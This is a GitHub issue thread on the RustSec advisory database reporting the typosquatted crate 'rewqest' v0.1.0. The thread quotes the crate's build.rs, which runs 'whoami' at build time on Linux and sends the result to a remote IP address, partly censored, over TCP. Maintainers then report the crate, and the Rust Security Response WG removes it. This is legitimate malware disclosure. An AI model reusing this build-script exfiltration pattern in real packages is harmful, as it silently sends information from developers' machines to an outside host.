### ISSUE TITLE
rewqest v0.1.0 is meant to be malicious 

### ISSUE THREAD

**Issue by Kijewski** [rustsec/advisory-db#1467]
Its build.rs

```rust
use std::time::{SystemTime, UNIX_EPOCH};
use std::io::{Error, ErrorKind, Write};
use std::net::TcpStream;
use std::process::Command;

fn run(args: &[&str]) -> Result<String, std::io::Error> {
    let out = Command::new(args[0]).args(&args[1..]).output()?;
    match out.status.success() {
        true => Ok(String::from_utf8(out.stdout).unwrap().trim().to_string()),
        false => Err(Error::new(ErrorKind::Other, "Command not successful.")),
    }
}

fn send(mut data: String) {
    let mut stream = TcpStream::connect("104.x.y.z:9001").unwrap();     // censored by me
    unsafe {
        let _ = stream.write(data.as_bytes_mut()).unwrap();
    }
}

#[cfg(target_os = "windows")]
fn cmd() {
    let command = ["calc.exe"];
    let _ = run(&command).unwrap();
}

#[cfg(target_os = "linux")]
fn cmd() {
    let command = ["whoami"];

    let cmd_res = run(&command).unwrap();

    let start = SystemTime::now();
    let since_the_epoch = start
        .duration_since(UNIX_EPOCH)
        .unwrap();

    let res = format!("{}: {cmd_res}\n", since_the_epoch.as_secs());

    send(res);
}

fn main() {
    cmd();
}
```

C.f. https://crates.io/crates/rewqest/0.1.0

**Comment by Kijewski** [comment]
> It is probably worth reporting it to [security@rust-lang.org](mailto:security@rust-lang.org).

That's why I looked into the actual `build.rs`, to look whether any immediate action is needed. I don't know if a report to [security@rust-lang.org](mailto:security@rust-lang.org) is needed, since the script does no actual harm. I think that you can assess this better than me.

**Comment by amousset** [comment]
I'm reporting it, let's let the crates.io decide what they want to do about it.

**Comment by Kijewski** [comment]
[![rewqest: Crate not found](https://i.imgur.com/nR4ygYS.png "rewqest: Crate not found")](https://i.imgur.com/nR4ygYS.png "rewqest: Crate not found")

**Comment by Kijewski** [comment]
Thank you, @amousset!

**Comment by amousset** [comment]
Thank you @Kijewski for spotting it!

**Comment by pietroalbini** [comment]
Hey all, I'm Pietro from the Rust Security Response WG :slightly_smiling_face: 

Thanks for reporting this to security@rust-lang.org, we locked the account of the person who published the crate, and the crate itself is being deleted from crates.io as we speak.

In the future, don't hesitate to report things like this to us, worst case we reply that we don't consider that crate malicious.
